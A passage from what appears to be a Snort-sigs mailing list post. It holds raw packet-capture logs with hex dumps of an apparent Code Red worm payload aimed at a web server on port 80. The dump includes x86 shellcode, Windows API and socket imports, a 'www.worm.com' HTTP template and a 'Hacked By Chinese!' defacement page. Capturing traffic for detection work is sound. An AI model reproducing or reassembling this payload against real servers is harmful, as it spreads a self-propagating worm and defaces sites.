0x0550: FE FF FF 83 C0 01 89 85 4C FE FF FF 8B 8D 64 FE  ........L.....d.
0x0560: FF FF 0F BE 11 85 D2 74 02 EB D3 8B F4 6A 00 8B  .......t.....j..
0x0570: 85 4C FE FF FF 50 8B 4D 08 8B 51 68 52 8B 85 78  .L...P.M..QhR..x
0x0580: FE FF FF 50 FF 95 C0 FE FF FF 3B F4 90 43 4B 43  ...P......;..CKC
0x0590: 4B 8B F4 6A 00 6A 01 8B 8D 68 FE FF FF 83 C1 05  K..j.j...h......
0x05A0: 51 8B 95 78 FE FF FF 52 FF 95 C0 FE FF FF 3B F4  Q..x...R......;.
0x05B0: 90 43 4B 43 4B C7 85 4C FE FF FF 00 00 00 00 8B  .CKCK..L........
0x05C0: 45 08 8B 48 64 89 8D 64 FE FF FF EB 1E 8B 95 64  E..Hd..d.......d
0x05D0: FE FF FF 83 C2 01 89 95 64 FE FF FF 8B 85 4C FE  ........d.....L.
0x05E0: FF FF 83 C0 01 89 85 4C FE FF                    .......L..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/08-04:05:05.693278 ME:80 -> 61.142.131.43:1616
TCP TTL:125 TOS:0x0 ID:13943 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x72BB4833  Ack: 0xD9983EDF  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/08-04:05:05.703278 61.142.131.43:1616 -> ME:80
TCP TTL:114 TOS:0x0 ID:50930 IpLen:20 DgmLen:1155 DF
***AP*** Seq: 0xD9984493  Ack: 0x72BB3CCB  Win: 0x4470  TcpLen: 20
0x0000: 00 10 DB 01 3A 31 00 E0 63 17 88 A1 08 00 45 00  ....:1..c.....E.
0x0010: 04 83 C6 F2 40 00 72 06 0D 7E 3D 8E 83 2B D0 2C  .... at ...491...~=..+.,
0x0020: 9F 1E 06 50 00 50 D9 98 44 93 72 BB 3C CB 50 18  ...P.P..D.r.<.P.
0x0030: 44 70 73 AD 00 00 FF 8B 8D 64 FE FF FF 0F BE 11  Dps......d......
0x0040: 85 D2 74 02 EB D3 8B F4 6A 00 8B 85 4C FE FF FF  ..t.....j...L...
0x0050: 50 8B 4D 08 8B 51 64 52 8B 85 78 FE FF FF 50 FF  P.M..QdR..x...P.
0x0060: 95 C0 FE FF FF 3B F4 90 43 4B 43 4B C7 85 4C FE  .....;..CKCK..L.
0x0070: FF FF 00 00 00 00 8B 8D 68 FE FF FF 83 C1 07 89  ........h.......
0x0080: 8D 64 FE FF FF EB 1E 8B 95 64 FE FF FF 83 C2 01  .d.......d......
0x0090: 89 95 64 FE FF FF 8B 85 4C FE FF FF 83 C0 01 89  ..d.....L.......
0x00A0: 85 4C FE FF FF 8B 8D 64 FE FF FF 0F BE 11 85 D2  .L.....d........
0x00B0: 74 02 EB D3 8B F4 6A 00 8B 85 4C FE FF FF 50 8B  t.....j...L...P.
0x00C0: 8D 68 FE FF FF 83 C1 07 51 8B 95 78 FE FF FF 52  .h......Q..x...R
0x00D0: FF 95 C0 FE FF FF 3B F4 90 43 4B 43 4B 8B 45 08  ......;..CKCK.E.
0x00E0: 8B 48 70 89 8D 4C FE FF FF 8B F4 6A 00 8B 95 4C  .Hp..L.....j...L
0x00F0: FE FF FF 52 8B 45 08 8B 48 78 51 8B 95 78 FE FF  ...R.E..HxQ..x..
0x0100: FF 52 FF 95 C0 FE FF FF 3B F4 90 43 4B 43 4B C6  .R......;..CKCK.
0x0110: 85 FC FE FF FF 00 8B F4 6A 00 68 00 01 00 00 8D  ........j.h.....
0x0120: 85 FC FE FF FF 50 8B 8D 78 FE FF FF 51 FF 95 C4  .....P..x...Q...
0x0130: FE FF FF 3B F4 90 43 4B 43 4B 89 85 4C FE FF FF  ...;..CKCK..L...
0x0140: 8B F4 8B 95 78 FE FF FF 52 FF 95 C8 FE FF FF 3B  ....x...R......;
0x0150: F4 90 43 4B 43 4B E9 0C FB FF FF EB FE E8 8C F5  ..CKCK..........
0x0160: FF FF EB 30 58 83 C0 05 55 57 53 56 50 6A 3C 8B  ...0X...UWSVPj<.
0x0170: F0 83 C6 0C 56 68 00 01 00 00 FF 70 08 FF 74 24  ....Vh.....p..t$
0x0180: 28 FF 10 58 50 FF 74 24 18 FF 50 04 58 5E 5B 5F  (..XP.t$..P.X^[_
0x0190: 5D FF 20 90 E8 CB FF FF FF E8 7B F9 FF FF 2C 37  ]. .......{...,7
0x01A0: 28 6E 84 32 03 75 F3 C9 41 00 00 01 00 00 78 56  (n.2.u..A.....xV
0x01B0: 34 12 B8 78 56 34 12 58 50 8B BD 68 FE FF FF 89  4..xV4.XP..h....
0x01C0: 47 F2 C3 8B 44 24 0C 05 B8 00 00 00 C7 00 0A CA  G...D$..........
0x01D0: CE 00 33 C0 C3 EB EC E8 F1 F4 FF FF 4C 6F 61 64  ..3.........Load
0x01E0: 4C 69 62 72 61 72 79 41 00 47 65 74 53 79 73 74  LibraryA.GetSyst
0x01F0: 65 6D 54 69 6D 65 00 43 72 65 61 74 65 54 68 72  emTime.CreateThr
0x0200: 65 61 64 00 43 72 65 61 74 65 46 69 6C 65 41 00  ead.CreateFileA.
0x0210: 53 6C 65 65 70 00 47 65 74 53 79 73 74 65 6D 44  Sleep.GetSystemD
0x0220: 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 56 69 72  efaultLangID.Vir
0x0230: 74 75 61 6C 50 72 6F 74 65 63 74 00 09 69 6E 66  tualProtect..inf
0x0240: 6F 63 6F 6D 6D 2E 64 6C 6C 00 54 63 70 53 6F 63  ocomm.dll.TcpSoc
0x0250: 6B 53 65 6E 64 00 09 57 53 32 5F 33 32 2E 64 6C  kSend..WS2_32.dl
0x0260: 6C 00 73 6F 63 6B 65 74 00 63 6F 6E 6E 65 63 74  l.socket.connect
0x0270: 00 73 65 6E 64 00 72 65 63 76 00 63 6C 6F 73 65  .send.recv.close
0x0280: 73 6F 63 6B 65 74 00 09 77 33 73 76 63 2E 64 6C  socket..w3svc.dl
0x0290: 6C 00 00 47 45 54 20 00 3F 00 20 20 48 54 54 50  l..GET .?.  HTTP
0x02A0: 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 79  /1.0..Content-ty
0x02B0: 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F 53  pe: text/xml.HOS
0x02C0: 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A 20  T:www.worm.com. 
0x02D0: 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E 74  Accept: */*.Cont
0x02E0: 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36 39  ent-length: 3569
0x02F0: 20 0D 0A 0D 0A 00 63 3A 5C 6E 6F 74 77 6F 72 6D   .....c:\notworm
0x0300: 00 4C 4D 54 48 0D 0A 3C 68 74 6D 6C 3E 3C 68 65  .LMTH..<html><he
0x0310: 61 64 3E 3C 6D 65 74 61 20 68 74 74 70 2D 65 71  ad><meta http-eq
0x0320: 75 69 76 3D 22 43 6F 6E 74 65 6E 74 2D 54 79 70  uiv="Content-Typ
0x0330: 65 22 20 63 6F 6E 74 65 6E 74 3D 22 74 65 78 74  e" content="text
0x0340: 2F 68 74 6D 6C 3B 20 63 68 61 72 73 65 74 3D 65  /html; charset=e
0x0350: 6E 67 6C 69 73 68 22 3E 3C 74 69 74 6C 65 3E 48  nglish"><title>H
0x0360: 45 4C 4C 4F 21 3C 2F 74 69 74 6C 65 3E 3C 2F 68  ELLO!</title></h
0x0370: 65 61 64 3E 3C 62 61 64 79 3E 3C 68 72 20 73 69  ead><bady><hr si
0x0380: 7A 65 3D 35 3E 3C 66 6F 6E 74 20 63 6F 6C 6F 72  ze=5><font color
0x0390: 3D 22 72 65 64 22 3E 3C 70 20 61 6C 69 67 6E 3D  ="red"><p align=
0x03A0: 22 63 65 6E 74 65 72 22 3E 57 65 6C 63 6F 6D 65  "center">Welcome
0x03B0: 20 74 6F 20 68 74 74 70 3A 2F 2F 77 77 77 2E 77   to http://www.w
0x03C0: 6F 72 6D 2E 63 6F 6D 20 21 3C 62 72 3E 3C 62 72  orm.com !<br><br
0x03D0: 3E 48 61 63 6B 65 64 20 42 79 20 43 68 69 6E 65  >Hacked By Chine
0x03E0: 73 65 21 3C 2F 66 6F 6E 74 3E 3C 2F 68 72 3E 3C  se!</font></hr><
0x03F0: 2F 62 61 64 79 3E 3C 2F 68 74 6D 6C 3E 20 20 20  /bady></html>   
0x0400: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0x0410: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0x0420: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0x0430: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0x0440: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0x0450: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0x0460: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0x0470: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0x0480: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                  
0x0490: 20                                                

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/08-04:05:05.703278 ME:80 -> 61.142.131.43:1616
TCP TTL:125 TOS:0x0 ID:13944 IpLen:20 DgmLen:40
*****R** Seq: 0x72BB3CCB  Ack: 0x72BB3CCB  Win: 0x0  TcpLen: 20




More information about the Snort-sigs mailing list